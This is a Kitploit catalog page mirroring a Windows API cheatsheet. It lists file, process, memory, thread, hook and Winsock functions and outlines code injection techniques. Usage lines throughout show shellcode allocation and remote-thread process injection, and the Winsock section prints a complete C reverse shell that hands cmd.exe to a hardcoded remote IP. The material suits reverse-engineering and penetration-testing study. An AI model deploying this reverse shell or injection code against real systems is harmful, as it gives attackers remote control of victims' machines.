Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
windows-api-function-cheatsheets — A reference of Windows API function calls, including functions for file operations, process management, memory management, thread management, dynamic-link library (DLL) management, synchronization, interprocess communication, Unicode string manipulation, error handling, Winsock networking operations, and registry operations. | Kitploit
Инструменты/GitHubGitHub/7etsuo/windows-api-function-cheatsheets
Reverse EngineeringPost-ExploitationMalware AnalysisBinary AnalysisCurated ResourcesPayload Development
GitHub7etsuo/windows-api-function-cheatsheets

windows-api-function-cheatsheets

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

1.5k1691 год назадПроверено Kitploit

A reference of Windows API function calls, including functions for file operations, process management, memory management, thread management, dynamic-link library (DLL) management, synchronization, interprocess communication, Unicode string manipulation, error handling, Winsock networking operations, and registry operations.

Поделиться

Шпаргалки по API

Шпаргалки по функциям Windows API

Контакты

🌨️ Tetsuo: https://www.x.com/tetsuo

Содержание

  • Шпаргалки по функциям Windows API
    • Операции с файлами
    • Управление процессами
    • Управление памятью
    • Управление потоками
    • Управление динамически подключаемыми библиотеками (DLL)
    • Синхронизация
    • Межпроцессное взаимодействие
    • Хуки Windows
    • Криптография
    • Отладка
    • Winsock
    • Операции с реестром
    • Обработка ошибок
    • Управление ресурсами
    • Функции для работы с Unicode-строками
      • Длина строки
      • Копирование строк
      • Конкатенация строк
      • Сравнение строк
      • Поиск в строке
      • Классификация и преобразование символов
    • Шпаргалка по структурам Win32
      • Общие структуры
      • Шпаргалка по структурам сокетов Win32 (winsock.h)
      • Шпаргалка по структурам сокетов Win32 (winsock2.h)
      • Шпаргалка по структурам сокетов Win32 (ws2def.h)
  • Техники внедрения кода
    • 1. Внедрение DLL
    • 2. Внедрение PE
    • 3. Рефлексивное внедрение
    • 4. Внедрение APC
    • 5. Опустошение процесса (замена процесса)
    • 6. AtomBombing
    • 7. Process Doppelgänging
    • 8. Process Herpaderping
    • 9. Внедрение через хуки
    • 10. Внедрение в дополнительную память Windows
    • 11. Propagate Injection
    • 12. Распыление кучи
    • 13. Перехват выполнения потока
    • 14. Module Stomping
    • 15. Перехват IAT
    • 16. Инлайн-перехват
    • 17. Внедрение через отладчик
    • 18. Угон COM
    • 19. Phantom DLL Hollowing
    • 20. PROPagate
    • 21. Early Bird Injection
    • 22. Внедрение на основе Shim
    • 23. Внедрение через проецирование (Mapping)
    • 24. Отравление кэша KnownDlls
  • Перечисление процессов

Вызовы функций Windows API

Операции с файлами

CreateFile```c HANDLE CreateFile( LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile ); // Opens an existing file or creates a new file.

root@kitploit:~
[ReadFile](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-readfile)```c
BOOL ReadFile(
  HANDLE hFile,
  LPVOID lpBuffer,
  DWORD nNumberOfBytesToRead,
  LPDWORD lpNumberOfBytesRead,
  LPOVERLAPPED lpOverlapped
); // Reads data from the specified file.

WriteFile```c BOOL WriteFile( HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped ); // Writes data to the specified file.

root@kitploit:~
[CloseHandle](https://docs.microsoft.com/en-us/windows/win32/api/handleapi/nf-handleapi-closehandle)```c
BOOL CloseHandle(
  HANDLE hObject
); // Closes an open handle.

Управление процессами

OpenProcess```c HANDLE OpenProcess( [in] DWORD dwDesiredAccess, [in] BOOL bInheritHandle, [in] DWORD dwProcessId ); // Opens an existing local process object. e.g., try to open target process

root@kitploit:~
```c
hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, (DWORD) pid);

CreateProcess```c HANDLE CreateProcess( LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation ); // The CreateProcess function creates a new process that runs independently of the creating process. For simplicity, this relationship is called a parent-child relationship.

root@kitploit:~
```c
// Start the child process
// No module name (use command line), Command line, Process handle not inheritable, Thread handle not inheritable, Set handle inheritance to FALSE, No creation flags, Use parent's environment block, Use parent's starting directory, Pointer to STARTUPINFO structure, Pointer to PROCESS_INFORMATION structure
CreateProcess( NULL, argv[1], NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); 

WinExec```c UINT WinExec( [in] LPCSTR lpCmdLine, [in] UINT uCmdShow ); // Runs the specified application.

root@kitploit:~
```c
result = WinExec(L"C:\\Windows\\System32\\cmd.exe", SW_SHOWNORMAL);

TerminateProcess```c BOOL TerminateProcess( HANDLE hProcess, UINT uExitCode ); // Terminates the specified process.

root@kitploit:~
[ExitWindowsEx](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-exitwindowsex)```c
BOOL ExitWindowsEx(
  [in] UINT  uFlags,
  [in] DWORD dwReason
); // Logs off the interactive user, shuts down the system, or shuts down and restarts the system.
root@kitploit:~
bResult = ExitWindowsEx(EWX_REBOOT, SHTDN_REASON_MAJOR_APPLICATION);

CreateToolhelp32Snapshot```c HANDLE CreateToolhelp32Snapshot( [in] DWORD dwFlags, [in] DWORD th32ProcessID ); // used to obtain information about processes and threads running on a Windows system.

root@kitploit:~
[Process32First](https://learn.microsoft.com/en-us/windows/win32/api/tlhelp32/nf-tlhelp32-process32first)```c
BOOL Process32First(
  [in]      HANDLE           hSnapshot,
  [in, out] LPPROCESSENTRY32 lppe
); // used to retrieve information about the first process encountered in a system snapshot, which is typically taken using the CreateToolhelp32Snapshot function.

Process32Next```c BOOL Process32Next( [in] HANDLE hSnapshot, [out] LPPROCESSENTRY32 lppe ); // used to retrieve information about the next process in a system snapshot after Process32First has been called. This function is typically used in a loop to enumerate all processes captured in a snapshot taken using the CreateToolhelp32Snapshot function.

root@kitploit:~
[WriteProcessMemory](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory)```c
BOOL WriteProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPVOID  lpBaseAddress,
  [in]  LPCVOID lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesWritten
); // Writes data to an area of memory in a specified process. The entire area to be written to must be accessible or the operation fails.
root@kitploit:~
WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL); // pRemoteCode from VirtualAllocEx

ReadProcessMemory```c BOOL ReadProcessMemory( [in] HANDLE hProcess, [in] LPCVOID lpBaseAddress, [out] LPVOID lpBuffer, [in] SIZE_T nSize, [out] SIZE_T *lpNumberOfBytesRead ); // ReadProcessMemory copies the data in the specified address range from the address space of the specified process into the specified buffer of the current process.

root@kitploit:~
```c
bResult = ReadProcessMemory(pHandle, (void*)baseAddress, &address, sizeof(address), 0);

Управление памятью

VirtualAlloc```c LPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, // Shellcode must be between 0x1 and 0x10000 bytes (page size) DWORD flAllocationType, // #define MEM_COMMIT 0x00001000 DWORD flProtect // #define PAGE_EXECUTE_READWRITE 0x00000040
); // Reserves, commits, or changes the state of a region of memory within the virtual address space of the calling process.

root@kitploit:~
[VirtualAllocEx](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex)```c
LPVOID VirtualAllocEx(
  [in]           HANDLE hProcess,
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
); // Reserves, commits, or changes the state of a region of memory within the virtual address space of a specified process. The function initializes the memory it allocates to zero.
root@kitploit:~
pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);

VirtualFree```c BOOL VirtualFree( LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType ); // Releases, decommits, or releases and decommits a region of memory within the virtual address space of the calling process.

root@kitploit:~
[функция VirtualProtect (memoryapi.h)](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect)```c
BOOL VirtualProtect(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flNewProtect,
  PDWORD lpflOldProtect
); // Changes the protection on a region of committed pages in the virtual address space of the calling process.

RtlMoveMemory```c VOID RtlMoveMemory( Out VOID UNALIGNED *Destination, In const VOID UNALIGNED *Source, In SIZE_T Length ); // Copies the contents of a source memory block to a destination memory block, and supports overlapping source and destination memory blocks.

root@kitploit:~
### Управление потоками
[CreateThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread)```c
HANDLE CreateThread(
  [in, optional]  LPSECURITY_ATTRIBUTES   lpThreadAttributes,         // A pointer to a SECURITY_ATTRIBUTES structure that specifies a security descriptor for the new thread and determines whether child processes can inherit the returned handle.
  [in]            SIZE_T                  dwStackSize,                // The initial size of the stack, in bytes.
  [in]            LPTHREAD_START_ROUTINE  lpStartAddress,             // A pointer to the application-defined function of type LPTHREAD_START_ROUTINE
  [in, optional]  __drv_aliasesMem LPVOID lpParameter,                // A pointer to a variable to be passed to the thread function.
  [in]            DWORD                   dwCreationFlags,            // The flags that control the creation of the thread.
  [out, optional] LPDWORD                 lpThreadId                  // A pointer to a variable that receives the thread identifier. If this parameter is NULL, the thread identifier is not returned.
); // Creates a thread to execute within the virtual address space of the calling process.
root@kitploit:~
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); WaitForSingleObject(th, 0);

CreateRemoteThread```c HANDLE CreateRemoteThread( [in] HANDLE hProcess, [in] LPSECURITY_ATTRIBUTES lpThreadAttributes, [in] SIZE_T dwStackSize, [in] LPTHREAD_START_ROUTINE lpStartAddress, [in] LPVOID lpParameter, [in] DWORD dwCreationFlags, [out] LPDWORD lpThreadId ); // Creates a thread that runs in the virtual address space of another process.

root@kitploit:~
```c
hThread = CreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, NULL); // pRemoteCode from VirtualAllocEx filled by WriteProcessMemory

CreateRemoteThreadEx```c HANDLE CreateRemoteThreadEx( [in] HANDLE hProcess, [in, optional] LPSECURITY_ATTRIBUTES lpThreadAttributes, [in] SIZE_T dwStackSize, [in] LPTHREAD_START_ROUTINE lpStartAddress, [in, optional] LPVOID lpParameter, [in] DWORD dwCreationFlags, [in, optional] LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, [out, optional] LPDWORD lpThreadId ); // Creates a thread that runs in the virtual address space of another process and optionally specifies extended attributes such as processor group affinity. // See InitializeProcThreadAttributeList

root@kitploit:~
```c
hThread = CreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, lpAttributeList, NULL); // pRemoteCode from VirtualAllocEx filled by WriteProcessMemory

ExitThread```c VOID ExitThread( DWORD dwExitCode ); // Terminates the calling thread and returns the exit code to the operating system.

root@kitploit:~
[GetExitCodeThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getexitcodethread)```c
BOOL GetExitCodeThread(
  HANDLE hThread,
  LPDWORD lpExitCode
); // Retrieves the termination status of the specified thread.

ResumeThread```c DWORD ResumeThread( HANDLE hThread ); // Decrements a thread's suspend count. When the suspend count is decremented to zero, the execution of the thread is resumed.

root@kitploit:~
[SuspendThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-suspendthread)```c
DWORD SuspendThread(
  HANDLE hThread
); // Suspends the specified thread.

TerminateThread```c BOOL TerminateThread( HANDLE hThread, DWORD dwExitCode ); // Terminates the specified thread.

root@kitploit:~
[CloseHandle](https://docs.microsoft.com/en-us/windows/win32/api/handleapi/nf-handleapi-closehandle)```c
BOOL CloseHandle(
  HANDLE hObject
); // Closes an open handle.

Управление динамически подключаемыми библиотеками (DLL)

LoadLibrary```c HMODULE LoadLibrary( LPCTSTR lpFileName ); // Loads a dynamic-link library (DLL) module into the address space of the calling process.

root@kitploit:~
[LoadLibraryExA](https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa)```c
HMODULE LoadLibraryExA(
  [in] LPCSTR lpLibFileName,
       HANDLE hFile,
  [in] DWORD  dwFlags
); // Loads the specified module into the address space of the calling process, with additional options.
root@kitploit:~
HMODULE hModule = LoadLibraryExA("ws2_32.dll", NULL, LOAD_LIBRARY_SAFE_CURRENT_DIRS);

GetProcAddress```c FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName ); // Retrieves the address of an exported function or variable from the specified DLL.

root@kitploit:~
```c
pLoadLibrary = (PTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle("Kernel32.dll"), "LoadLibraryA");

FreeLibrary```c BOOL FreeLibrary( HMODULE hModule ); // Frees the loaded DLL module and, if necessary, decrements its reference count.

root@kitploit:~
### Синхронизация
[CreateMutex](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createmutexa)```c
HANDLE CreateMutex(
  LPSECURITY_ATTRIBUTES lpMutexAttributes,
  BOOL bInitialOwner,
  LPCTSTR lpName
); // Creates a named or unnamed mutex object.

CreateSemaphore```c HANDLE CreateSemaphore( LPSECURITY_ATTRIBUTES lpSemaphoreAttributes, LONG lInitialCount, LONG lMaximumCount, LPCTSTR lpName ); // Creates a named or unnamed semaphore object.

root@kitploit:~
[ReleaseMutex](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-releasemutex)```c
BOOL ReleaseMutex(
  HANDLE hMutex
); // Releases ownership of the specified mutex object.

ReleaseSemaphore```c BOOL ReleaseSemaphore( HANDLE hSemaphore, LONG lReleaseCount, LPLONG lpPreviousCount ); // Increases the count of the specified semaphore object by a specified amount.

root@kitploit:~
[WaitForSingleObject](https://learn.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)```c
DWORD WaitForSingleObject(
  [in] HANDLE hHandle,
  [in] DWORD  dwMilliseconds
); // Waits until the specified object is in the signaled state or the time-out interval elapses.
root@kitploit:~
WaitForSingleObject(hThread, 500);

Межпроцессное взаимодействие

CreatePipe```c BOOL CreatePipe( PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize ); // Creates an anonymous pipe and returns handles to the read and write ends of the pipe.

root@kitploit:~
[CreateNamedPipe](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createnamedpipea)```c
HANDLE CreateNamedPipe(
  LPCTSTR lpName,
  DWORD dwOpenMode,
  DWORD dwPipeMode,
  DWORD nMaxInstances,
  DWORD nOutBufferSize,
  DWORD nInBufferSize,
  DWORD nDefaultTimeOut,
  LPSECURITY_ATTRIBUTES lpSecurityAttributes
); // Creates a named pipe and returns a handle for subsequent pipe operations.

ConnectNamedPipe```c BOOL ConnectNamedPipe( HANDLE hNamedPipe, LPOVERLAPPED lpOverlapped ); // Enables a named pipe server process to wait for a client process to connect to an instance of a named pipe.

root@kitploit:~
[DisconnectNamedPipe](https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-disconnectnamedpipe)```c
BOOL DisconnectNamedPipe(
  HANDLE hNamedPipe
); // Disconnects the server end of a named pipe instance from a client process.

CreateFileMapping```c HANDLE CreateFileMapping( HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCTSTR lpName ); // Creates or opens a named or unnamed file mapping object for a specified file.

root@kitploit:~
[MapViewOfFile](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-mapviewoffile)```c
LPVOID MapViewOfFile(
  HANDLE hFileMappingObject,
  DWORD dwDesiredAccess,
  DWORD dwFileOffsetHigh,
  DWORD dwFileOffsetLow,
  SIZE_T dwNumberOfBytesToMap
); // Maps a view of a file mapping into the address space of the calling process.

UnmapViewOfFile```c BOOL UnmapViewOfFile( LPCVOID lpBaseAddress ); // Unmaps a mapped view of a file from the calling process's address space.

root@kitploit:~
[CloseHandle](https://docs.microsoft.com/en-us/windows/win32/api/handleapi/nf-handleapi-closehandle)```c
BOOL CloseHandle(
  HANDLE hObject
); // Closes an open handle.

Хуки Windows

SetWindowsHookExA```c HHOOK SetWindowsHookExA( [in] int idHook, [in] HOOKPROC lpfn, [in] HINSTANCE hmod, [in] DWORD dwThreadId ); // Installs an application-defined hook procedure into a hook chain. You would install a hook procedure to monitor the system for certain types of events. These events are associated either with a specific thread or with all threads in the same desktop as the calling thread.

root@kitploit:~
[CallNextHookEx](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-callnexthookex)```c
LRESULT CallNextHookEx(
  [in, optional] HHOOK  hhk,
  [in]           int    nCode,
  [in]           WPARAM wParam,
  [in]           LPARAM lParam
); // Passes the hook information to the next hook procedure in the current hook chain. A hook procedure can call this function either before or after processing the hook information.

UnhookWindowsHookEx```c BOOL UnhookWindowsHookEx( [in] HHOOK hhk ); // Removes a hook procedure installed in a hook chain by the SetWindowsHookEx function.

root@kitploit:~
[GetAsyncKeyState](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate)```c
SHORT GetAsyncKeyState(
  [in] int vKey
); // Determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.

GetKeyState```c SHORT GetKeyState( [in] int nVirtKey ); // Retrieves the status of the specified virtual key. The status specifies whether the key is up, down, or toggled (on, off—alternating each time the key is pressed).

root@kitploit:~
[GetKeyboardState](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getkeyboardstate)```c
BOOL GetKeyboardState(
  [out] PBYTE lpKeyState
); // Copies the status of the 256 virtual keys to the specified buffer.

Криптография

CryptBinaryToStringA```c BOOL CryptBinaryToStringA( [in] const BYTE *pbBinary, [in] DWORD cbBinary, [in] DWORD dwFlags, [out, optional] LPSTR pszString, [in, out] DWORD *pcchString ); // The CryptBinaryToString function converts an array of bytes into a formatted string.

root@kitploit:~
[CryptDecrypt](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptdecrypt)```c
BOOL CryptDecrypt(
  [in]      HCRYPTKEY  hKey,
  [in]      HCRYPTHASH hHash,
  [in]      BOOL       Final,
  [in]      DWORD      dwFlags,
  [in, out] BYTE       *pbData,
  [in, out] DWORD      *pdwDataLen
); // The CryptDecrypt function decrypts data previously encrypted by using the CryptEncrypt function.

CryptEncrypt```c BOOL CryptEncrypt( [in] HCRYPTKEY hKey, [in] HCRYPTHASH hHash, [in] BOOL Final, [in] DWORD dwFlags, [in, out] BYTE *pbData, [in, out] DWORD *pdwDataLen, [in] DWORD dwBufLen ); // The CryptEncrypt function encrypts data. The algorithm used to encrypt the data is designated by the key held by the CSP module and is referenced by the hKey parameter.

root@kitploit:~
[CryptDecryptMessage](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptdecryptmessage)```c
BOOL CryptDecryptMessage(
  [in]                PCRYPT_DECRYPT_MESSAGE_PARA pDecryptPara,
  [in]                const BYTE                  *pbEncryptedBlob,
  [in]                DWORD                       cbEncryptedBlob,
  [out, optional]     BYTE                        *pbDecrypted,
  [in, out, optional] DWORD                       *pcbDecrypted,
  [out, optional]     PCCERT_CONTEXT              *ppXchgCert
); // The CryptDecryptMessage function decodes and decrypts a message.

CryptEncryptMessage```c BOOL CryptEncryptMessage( [in] PCRYPT_ENCRYPT_MESSAGE_PARA pEncryptPara, [in] DWORD cRecipientCert, [in] PCCERT_CONTEXT [] rgpRecipientCert, [in] const BYTE *pbToBeEncrypted, [in] DWORD cbToBeEncrypted, [out] BYTE *pbEncryptedBlob, [in, out] DWORD *pcbEncryptedBlob ); // The CryptEncryptMessage function encrypts and encodes a message.

root@kitploit:~
### Отладка
[IsDebuggerPresent](https://learn.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-isdebuggerpresent)```c
BOOL IsDebuggerPresent(); // Determines whether the calling process is being debugged by a user-mode debugger.

CheckRemoteDebuggerPresent```c BOOL CheckRemoteDebuggerPresent( [in] HANDLE hProcess, [in, out] PBOOL pbDebuggerPresent ); // Determines whether the specified process is being debugged.

root@kitploit:~
[OutputDebugStringA](https://learn.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-outputdebugstringa)```c
void OutputDebugStringA(
  [in, optional] LPCSTR lpOutputString
); // Sends a string to the debugger for display.

Winsock```c

/*** Windows Reverse Shell *

  • ██████ ███▄ █ ▒█████ █ █░ ▄████▄ ██▀███ ▄▄▄ ██████ ██░ ██
  • ▒██ ▒ ██ ▀█ █ ▒██▒ ██▒▓█░ █ ░█░▒██▀ ▀█ ▓██ ▒ ██▒▒████▄ ▒██ ▒ ▓██░ ██▒
  • ░ ▓██▄ ▓██ ▀█ ██▒▒██░ ██▒▒█░ █ ░█ ▒▓█ ▄ ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▓██▄ ▒██▀▀██░
  • ▒ ██▒▓██▒ ▐▌██▒▒██ ██░░█░ █ ░█ ▒▓▓▄ ▄██▒▒██▀▀█▄ ░██▄▄▄▄██ ▒ ██▒░▓█ ░██
  • ▒██████▒▒▒██░ ▓██░░ ████▓▒░░░██▒██▓ ▒ ▓███▀ ░░██▓ ▒██▒ ▓█ ▓██▒▒██████▒▒░▓█▒░██▓
  • ▒ ▒▓▒ ▒ ░░ ▒░ ▒ ▒ ░ ▒░▒░▒░ ░ ▓░▒ ▒ ░ ░▒ ▒ ░░ ▒▓ ░▒▓░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒
  • ░ ░▒ ░ ░░ ░░ ░ ▒░ ░ ▒ ▒░ ▒ ░ ░ ░ ▒ ░▒ ░ ▒░ ▒ ▒▒ ░░ ░▒ ░ ░ ▒ ░▒░ ░
  • ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░
  • root@kitploit:~
      ░           ░     ░ ░      ░    ░ ░         ░           ░  ░      ░   ░  ░  ░
    
  • root@kitploit:~
                                  Written by: [email protected] (snowcra5h) 2023
    
  • This program establishes a reverse shell via the Winsock2 library. It is
  • designed to establish a connection to a specified remote server, and execute commands
  • received from the server on the local machine, giving the server
  • control over the local machine.
  • Compile command (using MinGW on Wine):
  • wine gcc.exe windows.c -o windows.exe -lws2_32
  • This code is intended for educational and legitimate penetration testing purposes only.
  • Please use responsibly and ethically.

*/

#include <winsock2.h> #include <ws2tcpip.h> #include <stdio.h> #include <windows.h> #include <process.h>

const char* const PORT = "1337"; const char* const IP = "10.37.129.2";

typedef struct { HANDLE hPipeRead; HANDLE hPipeWrite; SOCKET sock; } ThreadParams;

DWORD WINAPI OutputThreadFunc(LPVOID data); DWORD WINAPI InputThreadFunc(LPVOID data); void CleanUp(HANDLE hInputWrite, HANDLE hInputRead, HANDLE hOutputWrite, HANDLE hOutputRead, PROCESS_INFORMATION processInfo, addrinfo* result, SOCKET sock);

int main(int argc, char** argv) { WSADATA wsaData; int err = WSAStartup(MAKEWORD(2, 2), &wsaData); if (err != 0) { fprintf(stderr, "WSAStartup failed: %d\n", err); return 1; }

root@kitploit:~
SOCKET sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, WSA_FLAG_OVERLAPPED);
if (sock == INVALID_SOCKET) {
    fprintf(stderr, "Socket function failed with error = %d\n", WSAGetLastError());
    WSACleanup();
    return 1;
}

struct addrinfo hints = { 0 };
hints.ai_family = AF_INET;
hints.ai_socktype = SOCK_STREAM;
struct addrinfo* result;
err = getaddrinfo(IP, PORT, &hints, &result);
if (err != 0) {
    fprintf(stderr, "Failed to get address info: %d\n", err);
    CleanUp(NULL, NULL, NULL, NULL, { 0 }, result, sock);
    return 1;
}

if (WSAConnect(sock, result->ai_addr, (int)result->ai_addrlen, NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
    fprintf(stderr, "Failed to connect.\n");
    CleanUp(NULL, NULL, NULL, NULL, { 0 }, result, sock);
    return 1;
}

SECURITY_ATTRIBUTES sa = { sizeof(SECURITY_ATTRIBUTES), NULL, TRUE };
HANDLE hInputWrite, hOutputRead, hInputRead, hOutputWrite;
if (!CreatePipe(&hOutputRead, &hOutputWrite, &sa, 0) || !CreatePipe(&hInputRead, &hInputWrite, &sa, 0)) {
    fprintf(stderr, "Failed to create pipe.\n");
    CleanUp(NULL, NULL, NULL, NULL, { 0 }, result, sock);
    return 1;
}

STARTUPINFO startupInfo = { 0 };
startupInfo.cb = sizeof(startupInfo);
startupInfo.dwFlags = STARTF_USESTDHANDLES;
startupInfo.hStdInput = hInputRead;
startupInfo.hStdOutput = hOutputWrite;
startupInfo.hStdError = hOutputWrite;
PROCESS_INFORMATION processInfo;

WCHAR cmd[] = L"cmd.exe /k";
if (!CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &startupInfo, &processInfo)) {
    fprintf(stderr, "Failed to create process.\n");
    CleanUp(hInputWrite, hInputRead, hOutputWrite, hOutputRead, processInfo, result, sock);
    return 1;
}

CloseHandle(hInputRead);
CloseHandle(hOutputWrite);
CloseHandle(processInfo.hThread);
ThreadParams outputParams = { hOutputRead, NULL, sock };
ThreadParams inputParams = { NULL, hInputWrite, sock };
HANDLE hThread[2];
hThread[0] = CreateThread(NULL, 0, OutputThreadFunc, &outputParams, 0, NULL);
hThread[1] = CreateThread(NULL, 0, InputThreadFunc, &inputParams, 0, NULL);

WaitForMultipleObjects(2, hThread, TRUE, INFINITE);
CleanUp(hInputWrite, NULL, NULL, hOutputRead, processInfo, result, sock);
return 0;

}

void CleanUp(HANDLE hInputWrite, HANDLE hInputRead, HANDLE hOutputWrite, HANDLE hOutputRead, PROCESS_INFORMATION processInfo, addrinfo* result, SOCKET sock) { if (hInputWrite != NULL) CloseHandle(hInputWrite); if (hInputRead != NULL) CloseHandle(hInputRead); if (hOutputWrite != NULL) CloseHandle(hOutputWrite); if (hOutputRead != NULL) CloseHandle(hOutputRead); if (processInfo.hProcess != NULL) CloseHandle(processInfo.hProcess); if (processInfo.hThread != NULL) CloseHandle(processInfo.hThread); if (result != NULL) freeaddrinfo(result); if (sock != NULL) closesocket(sock); WSACleanup(); }

DWORD WINAPI OutputThreadFunc(LPVOID data) { ThreadParams* params = (ThreadParams*)data; char buffer[4096]; DWORD bytesRead; while (ReadFile(params->hPipeRead, buffer, sizeof(buffer) - 1, &bytesRead, NULL)) { buffer[bytesRead] = '\0'; send(params->sock, buffer, bytesRead, 0); } return 0; }

DWORD WINAPI InputThreadFunc(LPVOID data) { ThreadParams* params = (ThreadParams*)data; char buffer[4096]; int bytesRead; while ((bytesRead = recv(params->sock, buffer, sizeof(buffer) - 1, 0)) > 0) { DWORD bytesWritten; WriteFile(params->hPipeWrite, buffer, bytesRead, &bytesWritten, NULL); } return 0; }

root@kitploit:~
[WSAStartup](https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-wsastartup)```c
int WSAStartup(
    WORD wVersionRequired, 
    LPWSADATA lpWSAData
); // Initializes the Winsock library for an application. Must be called before any other Winsock functions.

WSAConnect```c int WSAConnect( SOCKET s, // Descriptor identifying a socket. const struct sockaddr* name, // Pointer to the sockaddr structure for the connection target. int namelen, // Length of the sockaddr structure. LPWSABUF lpCallerData, // Pointer to user data to be transferred during connection. LPWSABUF lpCalleeData, // Pointer to user data transferred back during connection. LPQOS lpSQOS, // Pointer to flow specs for socket s, one for each direction. LPQOS lpGQOS // Pointer to flow specs for the socket group. ); // Establishes a connection to another socket application.This function is similar to connect, but allows for more control over the connection process.

root@kitploit:~
[WSASend](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsasend)```c
int WSASend(
    SOCKET s, // Descriptor identifying a connected socket.
    LPWSABUF lpBuffers, // Array of buffers for data to be sent.
    DWORD dwBufferCount, // Number of buffers in the lpBuffers array.
    LPDWORD lpNumberOfBytesSent, // Pointer to the number of bytes sent by this function call.
    DWORD dwFlags, // Flags to modify the behavior of the function call.
    LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations.
    LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the send operation has been completed.
); // Sends data on a connected socket.It can be used for both synchronous and asynchronous data transfer.

